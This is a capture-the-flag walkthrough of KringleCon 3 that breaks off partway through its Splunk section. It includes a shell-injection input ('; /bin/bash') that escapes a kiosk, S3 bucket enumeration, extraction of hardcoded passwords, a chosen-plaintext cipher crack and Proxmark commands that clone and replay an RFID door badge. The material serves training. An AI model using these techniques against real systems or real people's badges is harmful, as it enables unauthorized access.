KringleCon 3: French Hens

Writeup by Kumaus

It is this time of year again. Thousands of revellers are congregating at the North Pole again to enjoy the frosty hospitality of Santa, meet his elves, listen to interesting talks, solve the odd problem, enter live discussions, but most of all to get to know Marie, Pierre and Jean-Claude, the three mystery shrouded and surprisingly un-female hens from France. But how the times have changed! No more rustic North Pole train steaming across the ice, but instead a motorway exit complete with billboard, a huge parking lot and a gondola station. What happened to all the frosty charm of the polar wastes?

Up we go to meet Santa in front of his castle. A friendly welcome as always:

Santa: Hello and welcome to the North Pole! We’re super excited about this year’s KringleCon 3: French Hens. My elves have been working all year to upgrade the castle. It was a HUGE construction project, and we’ve nearly completed it. Please pardon the remaining construction dust around the castle and enjoy yourselves!

Impressive, the big man is even cooler than his usual self. And the castle has certainly grown: 5 oddly numbered floors linked by an elevator. The map below is an attempt to show the location of elves with something to say, terminal challenges, main objectives and, most importantly, the french hens. Stars indicate the items needed to repair the elevator, and the red crosses are locked doors which need to be opened one way or another.

Before getting busy inside the castle, an elf needs help at the bottom of the gondola.

Objective 1: Uncover Santa's Gift List

Difficulty: 1

There is a photo of Santa's Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.

Jingle Ringford: Oh, and before you head off up the mountain, you might want to try to figure out what's written on that advertising bilboard. Have you managed to read the gift list at the center? It can be hard when things are twirly. There are tools that can help! It also helps to select the correct twirly area.

⟶ Photopea is an online tool that could help Filter the Distortion that is this Twirl.

I) Untwirling with Photopea

The gift list is located at the bottom of the billboard, next to the Enigma machine. Apart from being twirled, the list is distorted by perspective. Before the twirl can be addressed, the perspective has to be removed. The steps in Photopea are:

Crop the gift list Edit -> Transform -> Distort to undo the perspective Select elliptic region and use Filter -> Distort -> Twirl

Finding the correct elliptic area to untwirl takes quite a lot of trial and error. My best attempt:

On the right side, the name "Josh" appears in 5th position from bottom, and on the right side this corresponds to proxmark , a nice tool encountered again in objective 5.

II) Untwirling with python

It is actually quite easy to write your own untwirler. Thanks to the deadline extension, there was a bit of extra time, so here we go:

from PIL import Imageimport mathimport numpyim1 = Image.open("../../img/o_01/distort.png")p1 = im1.load()w, h = im1.sizeim2 = Image.new(im1.mode, im1.size)p2 = im2.load()r_arr = [40, 70, 120, 170, 220, 300]omega_arr = [-3.2, -2.5, -2.0, -1.5, -0.7, 0] # Interpolation points for twirldef omega(r_): # untwirling function return numpy.interp(r_, r_arr, omega_arr)xo, yo = (560, 300) # origin of twirly_scale = 0.55 # scaling factor along y axisfor x in range(w): for y in range(h): r = math.sqrt((x - xo)**2 + (y - yo)**2 / y_scale**2) if r_arr[-1] < r < r_arr[-1] + 1: # Draw boundary of twirl p2[x, y] = (0, 0, 0) elif r < r_arr[-1]: x_twirl = xo + (x - xo) * math.cos(omega(r)) - (y - yo) / y_scale * math.sin(omega(r)) y_twirl = yo + (y - yo) * math.cos(omega(r)) + (x - xo) * y_scale * math.sin(omega(r)) y_twirl = min(y_twirl, h-1) p2[x,y] = p1[int(x_twirl),int(y_twirl)] else: p2[x,y] = p1[x,y]im2.show()im2.save("../../img/o_01/py_untwirl.png")

The twirled region can be elliptic, with scaling factor y_scale in y direction. Each pixel is rotated around the origin (xo, yo) by an amount depending on the radius. To define this untwirling function omega, I started from the outside and worked inwards to find interpolation values by trial and error. Compared to Photopea untwirling, it was much easier and faster to arrive at a vaguely readable gift list.

Terminal 2: Kringle Kiosk

Shinny Upatree: Hiya hiya - I'm Shinny Upatree! Check out this cool KringleCon kiosk! You can get a map of the castle, learn about where the elves are, and get your own badge printed right on-screen! Be careful with that last one though. I heard someone say it's "ingestible." Or something... Do you think you could check and see if there is an issue?

⟶ There's probably some kind of command injection vulnerability in the menu terminal.

Welcome to our castle, we're so glad to have you with us!

Come and browse the kiosk; though our app's a bit suspicious.

Poke around, try running bash, please try to come discover,

Need our devs who made our app pull/patch to help recover? Escape the menu by launching /bin/bash

The kiosk offers a selection of interesting and less riveting information, warning of dire consequences if anything except a single digit is entered:

a map of the castle with elevator locations the code of conduct a very useful elf directory a printer for the kringlecon name badge

However, entering special characters or long strings (trying to trigger buffer overflows) doesn't seem to affect the menu selection. Things get more interesting when looking at the badge generator:

This prompts to enter a name, which is then printed in the speech bubble of a reindeer. It includes another kind reminder not to enter any special characters, lest weird errors are caused. Of course, this is quite impossible to resist. The most telling error message comes up when entering something like xxx) :

bash: -c: line 0: syntax error near unexpected token `)'bash: -c: line 0: `/usr/games/cowsay -f /opt/reindeer.cow xxx)'

It's the infamous cowsay disguised as reindeer! Apparently everything entered after the prompt is simply appended after the cowasy command. According to the man page, any command-line arguments left over after all switches have been processed become the reindeer's message. So, we could enter additional switches to generate alternative badges, such as '-b Kumaus'. Fun, but no shell.

Entering a semicolon brings progress: the input abc;xyz results in a reindeer saying "abc", and an error message "bash: xyz: command not found".

The semicolon is of course the bash command seperator, and it does not get filtered. The input Kumaus; /bin/bash gives us shell and a success message.

Objective 2: Investigate S3 Bucket

Difficulty: 1

When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.

Shinny Upatree: Say, we've been having an issue with an Amazon S3 bucket. Do you think you could help find Santa's package file? Jeepers, it seems there's always a leaky bucket in the news. You'd think we could find our own files! Digininja has a great guide, if you're new to S3 searching. He even released a tool for the task - what a guy! The package wrapper Santa used is reversible, but it may take you some trying. Good luck, and thanks for pitching in!

⟶ It seems like there's a new story every week about data exposed through unprotected Amazon S3 buckets.

⟶ Robin Wood wrote up a guide about finding these open S3 buckets. He even wrote a tool to search for unprotected buckets!

⟶ Santa's Wrapper3000 is pretty buggy. It uses several compression tools, binary to ASCII conversion, and other tools to wrap packages.

⟶ Find Santa's package file from the cloud storage provider. Check Josh Wright's talk for more tips!

I) Background

Amazon Simple Storage Service (S3) is a cloud-based object storage system offered by Amazon through a Web Service interface, launched in 2006. Similar to classical folders and files, public or private data objects are organized in buckets and stored. The size of a bucket can be huge (< 5 TB). The objects are managed via Amazon S3 REST API or AWS SDK and accessed via HTTP GET or BitTorrent. Bucket access is controlled by (coarse) Access Control Lists. Each Bucket is identified by its globally unique bucket name selected by the owner. This can be simple or contrived, a bit like a password, and needs to be known or guessed if a bucket is to be found.

Ideally, access to private buckets should be restricted, but many buckets have been unintentionally marked public through carelessness when the bucket was created. They are now accessible for anyone who knows or can guess their bucket name. The tool bucket_finder.rb by Robin Wood automates the process of trying out different bucket names from a wordlist in order to find public ones, a bit like sifting the sand for gold nuggets. Let's get to it.

II) Find Santa's package

A terminal is waiting on the table next to Shinny:

Two items are included in the home directory: the bucket_finder software, and a list of TIPS:

If you need an editor to create a file you can run nano (vim is also available).

Everything you need to solve this challenge is provided in this terminal session.

The wordlist provided with bucket_finder has only 3 entries: kringlecastle, wrapper and santa. Running the bucket_finder with this list finds several interesting sounding buckets, but nothing public:

~/bucket_finder$ ./bucket_finder.rb wordlist http://s3.amazonaws.com/kringlecastle Bucket found but access denied: kringlecastle http://s3.amazonaws.com/wrapper Bucket found but access denied: wrapper http://s3.amazonaws.com/santa Bucket santa redirects to: santa.s3.amazonaws.com http://santa.s3.amazonaws.com/ Bucket found but access denied: santa

Let's refine the wordlist. In the motd shown when opening the terminal, Wrapper3000 is highlighted in green (hint, hint), so that seems a good place to start. Adding Wrapper3000 scores no hits, but the lowercase wrapper3000 strikes gold:

http://s3.amazonaws.com/wrapper3000 Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 ) <Public> http://s3.amazonaws.com/wrapper3000/package

Using the --download option creates the directory wrapper3000 containing a single file: package

III) Unwrap the overwrapped package

I get it, Santa likes to wrap presents, and he is good at it (or rather his elves are). But this is way over the top, even for the big man. In most cases, the file suffix is enough to reveal the compression or archiving mechanism used. If uncertain, the file command gives valuable insights.

filename file command file type unpacking package ASCII text, with

very long lines Base 64 encoding base64 -d package > p2 p2 Zip archive data,

at least v1.0 to extract zip archive unzip p2 package.txt.Z.xz.xxd.tar.bz2 bzip2 compressed data,

block size = 900k Bzip2 compressed file bunzip2 package.txt.Z.xz.xxd.tar.bz2 package.txt.Z.xz.xxd.tar POSIX tar archive Tar archive tar -xf package.txt.Z.xz.xxd.tar package.txt.Z.xz.xxd ASCII text xxd hexdump xxd -r package.txt.Z.xz.xxd

package.txt.Z.xz package.txt.Z.xz XZ compressed data XZ compressed file xz -d package.txt.Z.xz package.txt.Z compress'd data 16 bits Compress file compress -d package.txt.Z

The content of the final layer is short and to the point: North Pole: The Frostiest Place on Earth Wait a minute ... this does NOT sound like Santa. Something is afoot ...

Terminal 3: Linux Primer

Sugarplum Mary: Sugarplum Mary? That's me! I was just playing with this here terminal and learning some Linux! It's a great intro to the Bash terminal. If you get stuck at any point, type hintme to get a nudge! Can you make it to the end?

Shocking news: all the lollipops on the system have been stolen by evil munchkins. Their name suggests otherwise, but apparently they haven't eaten the lollipops yet, so our task is to chase up the munchkins and to recapture the lollipops. Niceness points can be hoped for if none go missing in the process. And the good part for Linux patzers like myself: hints are freely available!

Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop! ls Now find the munchkin inside the munchkin. cat munchkin_19315479765589239 Great, now remove the munchkin in your home directory. rm munchkin_19315479765589239 Print the present working directory using a command. pwd Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin! ls -a Excellent, now find the munchkin in your command history. history Find the munchkin in your environment variables. env Next, head into the workshop. cd workshop A munchkin is hiding in one of the workshop toolboxes. Use "grep" while ignoring case to find which toolbox the munchkin is in. grep -i "munchkin" * A munchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin. chmod a+x lollipop_engine

./lollipop_engine Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0. cd /home/elf/workshop/electrical

mv blown_fuse0 fuse0 Now, make a symbolic link (symlink) named fuse1 that points to fuse0 ln -s fuse0 fuse1 Make a copy of fuse1 named fuse2. cp fuse1 fuse2 We need to make sure munchkins don't come back. Add the characters "MUNCHKIN_REPELLENT" into the file fuse2. echo "MUNCHKIN_REPELLENT" >> fuse2 Find the munchkin somewhere in /opt/munchkin_den. find /opt/munchkin_den/ -iname "munchkin*" Find the file somewhere in /opt/munchkin_den that is owned by the user munchkin. find /opt/munchkin_den/ -user munchkin Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den. find /opt/munchkin_den/ -size +108k -size -110k List running processes to find another munchkin. ps -ef The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen. netstat -napt The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin. curl localhost:54321 Your final task is to stop the 14516_munchkin process to collect the remaining lollipops. kill 44106

All lollipops have been saved. I now feel very nice, but hungry.

Objective 3: Point-of-Sale Password Recovery

Difficulty: 1

Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What's the password?

Sugarplum Mary: Hey, wouldja' mind helping me get into my point-of-sale terminal? It's down, and we kinda' need it running. Problem is: it is asking for a password. I never set one! Can you help me figure out what it is so I can get set up? Shinny says this might be an Electron application. I hear there's a way to extract an ASAR file from the binary, but I haven't looked into it yet.

⟶ It's possible to extract the source code from an Electron app.

⟶ There are tools and guides explaining how to extract ASAR from Electron apps.

Electron is a framework used to create desktop applications with JS, HTML and CSS, without having to rely on OS specific native frameworks. Electron is built on Node.js and employs a specific archive format, ASAR, to hold the application files including source code.

Attempting to open the terminal downloads the app for offline investigation: santa-shop.exe, which is a rather large self-extracting archive. Within the folder $PLUGINSDIR it contains a 50 MB archive app-64.7z. This second archive holds all important application binaries and has the subfolders locales, resources and swiftshader. Poking around the resources folder reveals app.asar, the ASAR file we are looking for.

But how to open it? The tools and guide hinted at all require a running node.js, which is a bit annoying to install just for this purpose. Luckily, there is a simpler way for backwater Windows users such as myself. A kind soul has written a 7zip plugin called Azar7z which is capable of opening .asar files. Installation and usage are described here. The unpacked contents of app.asar can be admired in src/o_03/asar/ (I have renamed index.html to make the directory visible).

The file README.md points to the location of the password (ever so kind ...)

Remember, if you need to change Santa's passwords, it's at the top of main.js!

and there it is indeed:

const SANTA_PASSWORD = 'santapass';

Terminal 4: Unescape Tmux

Pepper Minstix: Howdy - Pepper Minstix here! I've been playing with tmux lately, and golly it's useful. Problem is: I somehow became detached from my session. Do you think you could get me back to where I was, admiring a beautiful bird? If you find it handy, there's a tmux cheat sheet you can use as a reference. I hope you can help!

This terminal is an excellent opportunity for first contact and some hands-on experience with Tmux (which IS rather cool). One can play with the terminal, open several sessions, windows and panes and mess around with them. The experience comes in very handy in objective 9 later on.

A bit of background: Tmux is an open-source terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window, and is useful for running several command-line programs at the same time. One of the best features: Processes started from within tmux can be detached from their panes without killing them. They will continue running in the background and can be reattached at a later time.

It seems that Pepper has managed to detach his green birdy session from his pane. Luckily, thanks to tmux, this didn't stop the session, it was simply moved to the background. To find it, we need to list all running sessions and look for a small green flying one, and then reattach this session to the terminal pane.

~$ tmux ls 0: 1 windows (created Tue Dec 29 18:02:11 2020) [80x24]~$ tmux attach -t 0

There is only a single session chugging along in the background, so that must be the one. We just made Pepper a happy elf and hopefully gained several niceness points in the process.

Objective 4: Santavator operations

Difficulty: 2

Talk to Pepper Minstix in the entryway to get some hints about the Santavator..

Pepper Minstix: Hey, maybe I can help YOU out! There's a Santavator that moves visitors from floor to floor, but it's a bit wonky. You'll need a key and other odd objects. Try talking to Sparkle Redberry about the key. For the odd objects, maybe just wander around the castle and see what you find on the floor. Once you have a few, try using them to split, redirect, and color the Super Santavator Sparkle Stream (S4). You need to power the red, yellow, and green receivers with the right color light! Sparkle Redberry: Hey hey, Sparkle Redberry here! The Santavator is on the fritz. Something with the wiring is grinchy, but maybe you can rig something up? Here's the key! Good luck! On another note, I heard Santa say that he was thinking of canceling KringleCon this year! At first, I thought it was a joke, but he seemed serious. I’m glad he changed his mind. Have you had a chance to look at the Santavator yet? With that key, you can look under the panel and see the Super Santavator Sparkle Stream (S4). To get to different floors, you'll need to power the various colored receivers. ... There MAY be a way to bypass the S4 stream.

Santa really came up with a beautiful puzzle here. It would almost be a shame to cheat, so this option is left for objective 10, part III). After Sparkle Redberry hands over the elevator key, the S4 stream becomes visible. Somehow, the particles rising from the source have to be coloured green, red and yellow, and the coloured particles diverted to the corresponding coloured receptors. This can be done with the help of different items hidden around the castle. A small table shows which colours are required to reach the different castle floors. The first task is clearly to fix the green coloured strem, followed by red, and finally yellow. Item locations in order of discovery (see also map):

Floor Room Location Item 1 Castle approach In front of the castle door Broken candycane 1 Entry Near Santavator Hex nut 1 Dining room Courtyard passage Hex nut 1 Courtyard Top left corner Green bulb 2 Talks lobby Top right flowerpot Red bulb 2 Speaker Unpreparedness Near door Button 2 Speaker Unpreparedness Talk to vending machine Portal candies R Netwars room Near sleigh Yellow bulb 1.5 Workshop Right of benches Large marble 1.5 Wrapping room Bottom right corner Rubber ball

Please forgive the usage of "top right" etc in the directions. Clearly this is garbage, but compass directions simply don't work at the North Pole. Anyway, the items have different properties:

The hex nuts and candycane act as particle guides, redirecting particles along their edges. They do not reflect!

The rubber ball reflects particles and can cause the wide particle beam to diverge because of its curvature.

If particles enter one of the portal candies, they fly out of the other in the same direction.

The marble acts as a particle attractor.

While the green and red receptors were easy to light up, yellow was quite tricky. The problem is that the particles leave the emitter from a random horizontal position (wide beam), and the receptors require a steady stream in order to remain powered. Therefore, it is essential to lose as few particles as possible. Because of their spraying effect, this makes marble and rubber ball less useful. In the end, the straightforward items and the portals carried the day.

All floors are accessible at this point except floor 3 (Santas office), which is protected by an additional fingerprint sensor.

Terminal 5a: Speaker UNPrep

I) Open the door

Bushy Evergreen: Ohai! Bushy Evergreen, just trying to get this door open. It's running some Rust code written by Alabaster Snowball. I'm pretty sure the password I need for ./door is right in the executable itself. Isn't there a way to view the human-readable strings in a binary file?

The strings command is common in Linux and available in Windows as part of SysInternals.

The command strings door lists all printable strings of length ≥ 4 in the binary ./door , which is quite overwhelming. Some filtering is required, and a good first step is to check message length strings. So, let's limit output to length ≥ 30, and add the option -t x to print the hex offset of the found strings. This turns out to be enough:

~ $ strings -30 -t x door e54 _Unwind_GetLanguageSpecificData 2c040 6666666666666666\\\\\\\\\\\\\\\\ 2c210 at 0123456789abcdef 2c260 connection resetentity not foundalready borrowed$ 2ca1c /home/elf/doorYou look at the screen. It wants a password. You roll your eyes - the 2ca71 password is probably stored right in the binary. There's gotta be a 2cb20 NulErrorBox thread 'expected, found Door opened! 2cb55 That would have opened the door! 2cb76 Be sure to finish the challenge in prod: And don't forget, the password is " Op3nTheD00r " 2cbea src/liballoc/raw_vec.rscapacity overflowa formatting trait implementation returned an error/usr/src/rustc-1.41.1/src/libcore/fmt/mod.rsstack backtrace: ...

As Bushy thought, the password is written unencrypted in the executable. Running the executable end entering this password opens the door and pleases Bushy, but he soon wants more ...

II) Switch on the lights

Bushy Evergreen: That's it! What a great password... Oh, this might be a good time to mention another lock in the castle. Santa asked me to ask you to evaluate the security of our new HID lock. If ever you find yourself in posession of a Proxmark3, click it in your badge to interact with it. It's a slick device that can read others' badges! Hey, you want to help me figure out the light switch too? Those come in handy sometimes. The password we need is in the lights.conf file, but it seems to be encrypted. There's another instance of the program and configuration in ~/lab/ you can play around with. What if we set the user name to an encrypted value?

While you have to use the lights program in /home/elf/ to turn the lights on, you can delete parts in /home/elf/lab/.

The ./lights executable is a bit more secure, using strings brings no insights here. The configuration file lights.conf with the encrypted password

password: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124name: elf-technician

gives no immediate enlightenment. The strange log message which interrupted the output is interesting, but hard to understand. One possible interpretation is that fields in lights.conf are selected for decryption based on a check testing for decryptability. Because "fields" is used in the plural, this would imply that also the name field is decrypted if that is possible. We have to modify the configuration file in order to test, and this can only be done in the lab folder, where lab/lights.conf is not write protected and can be experimented with. Trying a plaintext password

password: OpenSesame name: BigBadBear

and running lab/lights welcomes BigBadBear back. The password OpenSesame works, switching on the lights ... in the lab simulation. The real executable is not so easy to trick, because lights.conf cannot be modified. However, we can turn the tables and use the name field in the lab to decrypt for us, as Bushy suggests. Running lab/lights on

password: OpenSesamename: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124

produces the output The terminal just blinks: Welcome back, Computer-TurnLightsOn . We now know the password, and the lights can be turned back on for real.

III) Turn on the vending machine

Bushy Evergreen: Wow - that worked? I mean, it worked! Hooray for opportunistic decryption, I guess! Oh, did I mention that the Proxmark can simulate badges? Cool, huh? There are lots of references online to help. In fact, there's a talk going on right now! So hey, if you want, there's one more challenge. You see, there's a vending machine in there that the speakers like to use sometimes. Play around with ./vending_machines in the lab folder. You know what might be worth trying? Delete or rename the config file and run it. Then you could set the password yourself to AAAAAAAA or BBBBBBBB. If the encryption is simple code book or rotation ciphers, you'll be able to roll back the original password.

For polyalphabetic ciphers, if you have control over inputs and visibilty of outputs, lookup tables can save the day.

Opportunistic decryption, indeed! The ./vending-machines executable again uses a configuration file vending-machines.json to store username and password:

{ "name": "elf-maintenance", "password": "LVEdQPpBwr"}

In the lab folder, where there is no edit protection, we can follow the suggestion to delete the configuration file before running the code. It simply asks for new credentials:

The simulated vending machine is running, but this does not impress the real one. The configuration file has reappeared and shows the encryption of our password "abcd": a chosen plaintext attack is possible!

{ "name": "Kumaus", "password": " 9Ued "}

Experimentation shows that the encryption preserves the number of characters, and feeding it a sequence of identical characters as plaintext reveals periodic behaviour with period 8:

AAAAAAAAAAAAAAA ⟶ XiGRehmw XiGRehm .

All indications point to a polyalphabetic substitution cipher, using 8 different encryption alphabets depending on position. Additional experiments show that lowercase letters, uppercase letters and numerals are substituted, all other characters are left alone. To crack the cipher, we require a lookup table covering each substituted character in all 8 positions, a total of 496 entries. We generate one by submitting a 496 character password:

pwd : aaaaaaaabbbbbbbbcccccccc ... XXXXXXXXYYYYYYYYZZZZZZZZ0000000011111111 ... 8888888899999999 enc : 9VbtacpgGUVBfWhPe9ee6EER ... 0PHMxOl0rQKqjDq2KtqoNicv3ehm9ZFH2rDO5LkI ... VXmFSQw4lCgPE6x7

which was generated with the python one-liner

''.join([c*8 for c in string.ascii_letters + string.digits])

The full lookup table can be found here. Decryption could be done by hand, but that is rather painful. Python to the rescue: vending_decoder.py

with open("lookup_table.txt", 'r') as fh: alphabet = fh.readline().strip() key = fh.readline().strip()password_ct = "LVEdQPpBwr"password = ""for n in range(len(password_ct)): positional_alphabet = key[n%8::8] index = positional_alphabet.index(password_ct[n]) password += alphabet[8 * index + n%8]print(password)

The password CandyCane1 finally satisfies greedy Bushy and restarts Release the Snacken, which spits out portal candies for the Santavator after some rumbling and grumbling. I can also highly recommend the box of weasels, a reknown elvish delicacy.

Terminal 5b: 33 Gkbps

Fitzy Shortstack: "Put it in the cloud," they said... "It'll be great," they said... All the lights on the Christmas trees throughout the castle are controlled through a remote server. We can shuffle the colors of the lights by connecting via dial-up, but our only modem is broken! Fortunately, I speak dial-up. However, I can't quite remember the handshake sequence. Maybe you can help me out? The phone number is 756-8347; you can use this blue phone.

Fun! Fitzy certainly is a rather special elf. Because I am not quite as fluent in dial-up (gah, tones of my nightmares ...), it took a bit of fiddling until Fitzies tones and those from the modem noise example were matched:

Phone/Modem Fitzy Shortstack Pick up handset<dial tone> 7568347<modem tone> baa DEE brrr<modem tones> aaah WEWEWwrwrrwrr<modem tones> beDURRdunditty SCHHRRHHRTHRTR

A message now states "Your lights have been updated". The lights can be shuffeled again, the potentially cataclysmic disaster of boring static lights has been averted, Fitzy is happy and we get a hint for objective 5.

Objective 5:

Difficulty: 2

Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.

Bushy Evergreen: Good luck navigating the rest of the castle. And that Proxmark thing? Some people scan other people's badges and try those codes at locked doors. Other people scan one or two and just try to vary room numbers. Do whatever works best for you! Fitzy Shortstack: 탢ݵרOُ񆨶$Ԩ؉楌Բ ahem! We did it! Thank you!! Anytime you feel like changing the color scheme up, just pick up the phone! You know, Santa really seems to trust Shinny Upatree...

⟶ The Proxmark is a multi-function RFID device, capable of capturing and replaying RFID events.

⟶ You can use a Proxmark to capture the facility code and ID value of HID ProxCard badge by running lf hid read when you are close enough to someone with a badge.

⟶ You can also use a Proxmark to impersonate a badge to unlock a door, if the badge you impersonate has access. lf hid sim -r 2006......

⟶ Larry Pesce knows a thing or two about HID attacks. He's the author of a course on wireless hacking!

⟶ There's a short list of essential Proxmark commands

This introduction to Proxmark3 and the incredible weakness of non-reinforced door cards was excellent! Once all available hints were collected and the background was digested, the remaining tasks were quickly done. We are trying to jemmy a card-controlled door lock in the workshop, and the easiest way to do this would be to find an authorized card, to scan it secretly using the Proxmark from a distance and to replay the scan near the door. The Proxmark terminal can be opened by accessing the Proxmark item (found on the wrapping room floor next to the table) in the Kringlecon badge item list.

Scanning the neighbourhood for cards is initiated by the command lf hid read , but Santa and most elves don't seem to have scannable cards. Luckily Fitzy Shortstack hinted that Shinny Upatree in front of the castle is Santa's Most Trusted. Sneaking up on her from behind (have to do these things right) and scanning the area finds a card:

[magicdust] pm3 --> lf hid read #db# TAG ID: 2006e22f13 (6025) - Format Len: 26 bit - FC: 113 - Card: 6025

After a quick dash back to the workshop, replaying the Wiegand code of Shinny's card unlocks the door:

[magicdust] pm3 --> lf hid sim -r 2006e22f13 [=] Simulating HID tag using raw 2006e22f13[=] Stopping simulation after 10 seconds.[=] Done

This completes the objective, but we cannot leave without checking what is behind the door. We are swallowed by a completely dark room with an invisible maze, luckily without any hungry grues. After navigating this maze, two eye shaped openings appear on the other side of the room. Now where have I seen that before?

Getting close to those eyes leads to a John Albert Santovich experience:

I just became Santa!! Now this is fun! Luckily for Santa, I am neither Jack Frost nor a disenchanted puppeteer. One can return to one's own body by walking back through the painting, but let's remain in Santas shoes for a while. The elves react differently, Santas office is now accessible through the Santavator, and all remaining objectives except 10 can only be done while being Santa. Ho ho mwHOHOhohoho.

Terminal 6: Regex Toy Sorting

Noel Boetie (as Santa): Hey there, KringleCon attendee! I'm Minty Candycane! I'm working on fixing the Present Sort-O-Matic. The Sort-O-Matic uses JavaScript regular expressions to sort presents apart from misfit toys, but it's not working right. With some tools, regexes need / at the beginning and the ends, but they aren't used here. You can find a regular expression cheat sheet here if you need it. You can use this regex interpreter to test your regex against the required Sort-O-Matic patterns. Do you think you can help me fix it?

⟶ Handy quick reference for JS regular expression construction.

⟶ Here's a place to try out your JS Regex expressions.

Training Regx on a toy sorting machine ... whatever you say, Santa. Help is available at all times, both for the terminal (click help button) and for each question (click text above mask).

Time for some RegEx kung-fu.

Create a regular expression that will only match any string containing at least one digit. \d+ Create a regular expression that will only match only alpha characters A-Z of at least 3 characters in length or greater while ignoring case. [a-zA-Z]{3,} Create a Regex That Matches Two Consecutive Lowercase a-z or numeric characters. Create a regular expression that will only match at least two consecutive lowercase a-z or numeric characters. [a-z\d]{2} Create a regular expression that will only match any two characters that are NOT uppercase A through L and NOT numbers 1 through 5. [^A-L1-5]{2} Create a regular expression that only matches if the entire string is composed of entirely digits and is at least 3 characters in length. ^\d{3,}$ Create a regular expression that only matches if the entire string is a valid Hour, Minute and Seconds time format similar to the following: 12:24:53, 1:05:24, 23:02:43, 08:04:10 However, the following would be invalid: 25:30:86, A1:E4:B5, B2:13:4A, 32:24:53, 08:74:53, 12:5:24 Use anchors or boundary markers to avoid matching other surrounding strings. ^([01]?[0-9]|2[0-3]):[0-5][0-8]:[0-5][0-8]$ Create a regular expression that only matches if the entire string is a MAC address, ignoring case. For example: 00:0a:95:9d:68:16, 76:A4:5A:D2:69:93, B8:13:13:D1:18:EC, 95:ce:00:4a:22:df However, the following would be examples of invalid MAC Addresses: 97:z2:gf:c4:02:c2, de:140:130:69:7_-bd, C0:HH:EE:50:B7:C3 Use anchors or boundary markers to avoid matching other surrounding strings. ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ Create a regular expression that only matches one of the three following day, month, and four digit year formats: 10/01/1978, 01.10.1987, 14-12-1991 However, the following values would be invalid formats: 05/25/89, 12-32-1989, 01.1.1989, 1/1/1 Use anchors or boundary markers to avoid matching other surrounding strings. ^(0[1-9]|[12][0-9]|3[01])[/.-](0[1-9]|1[0-2])[/.-]\d{4}$

Objective 6: Splunk Challenge

Difficulty: 3

Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?

Minty Candycane: Hey, have you tried the Splunk challenge? Are you newer to SOC operations? Maybe check out his intro talk from last year. Dave Herrald is doing a great talk on tracking adversary emulation through Splunk! Don't forget about useful tools including Cyber Chef for decoding and decrypting data! It's down in the Great Room, but oh, they probably won't let an attendee operate it.

⟶ There was a great Splunk talk at KringleCon 2 that's still available!

⟶ Dave Herrald talks about emulating advanced adversaries and hunting them with Splunk.

⟶ Great tool for all sorts of coding and decoding: CyberChef

This years Splunk challenge has a very pleasing interface and revolves around adversary emulation, which makes the talk by Dave Herrald required reading. Attacks are emulated in the Splunk Attack Range framework, and their analysis requires three components:

The MITRE ATT&CK knowledge base, which categorizes attacks into tactics (why?) and techniques (how?). Each attack technique and its variations (subtechniques) is uniquely identified and described in great detail. The Atomic Red Team project by red canary is a collection of small, portable tests on github mapped to the corresponding techniques in MITRE ATT&CK. It provides code to actually execute the attacks described in Mitre. In Splunk the progression of emulated attacks is recorded and stored. The attacks are categorized by index corresponding to the Mitre ID of the technique. For example, a search for index=t1547* will find all events related to Mitre ID T1547 and its subtechniques.

Alice: Ok elves! Like Santa said, I simulated a bunch of ATT&CK techniques/sub-techniques and stored the results from each run in its own dedicated set of Splunk indexes. Check out the Splunk Search Interface to get started answering Training Question 1.

Normally, eager young elves learn the ropes in the attack ranges. This time, however, there is a special guest. Santa "has not been feeling himself lately" (ho ho ho) and is therefore participating in the challenge, getting tips from Alice.

Question 1:

How many distinct MITRE ATT&CK techniques did Alice emulate?

According to Alice, every simulation is stored within its own index. A good first try is therefore the following query, which counts all indexed events categorized by index, resulting in 26 different categories:

| tstats count where index=* by index

1 attack 68 2 t1033-main 3311 3 t1033-win 21734 4 t1057-win 18006 5 t1059.003-main 1984 ...

This is not quite what we want, because the index name also includes sub-technique and main/win selection. This causes duplicates, we just require the main technique, identified by a 4 digit Mitre id. To filter those duplicates, lets create a new field 'technique' consisting of the first 5 characters of the index:

index=t* | eval technique = substr(index, 0, 5) | stats count by technique

1 t1033 25045 2 t1057 18006 3 t1059 41113 4 t1071 23513 5 t1082 18136 6 t1105 17362 7 t1106 20331 8 t1123 24769 9 t1204 21375 10 t1547 21323 11 t1548 28517 12 t1559 24468 13 t1566 19688

The answer: there are 13 distinct techniques covered.

Question 2:

What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

The query is similar to question 1 query, restricted to a single technique and sub-technique:

| tstats count where index=T1059.003* by index

1 t1059.003-main 1984 2 t1059.003-win 18519

with answer string t1059.003-main t1059.003-win

Question 3:

One technique that Santa had us simulate deals with 'system information discovery'. What is the full name of the registry key that is queried to determine the MachineGuid?

The MITRE ATT&CK site holds the categorisation of the different attacks into tactics and techniques. In the enterprise matrix, a technique 'system information discovery' can be found under the tactic header 'discovery' with ID T1082: one of Alice's chosen techniques (see question 1). Implementation details of this technique are collected under the same ID in the atomics folder at Atomic Red Team, in T1082.md. Test #8 is about Windows MachineGUID Discovery and queries the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography , which answers question 3.

Question 4:

According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)

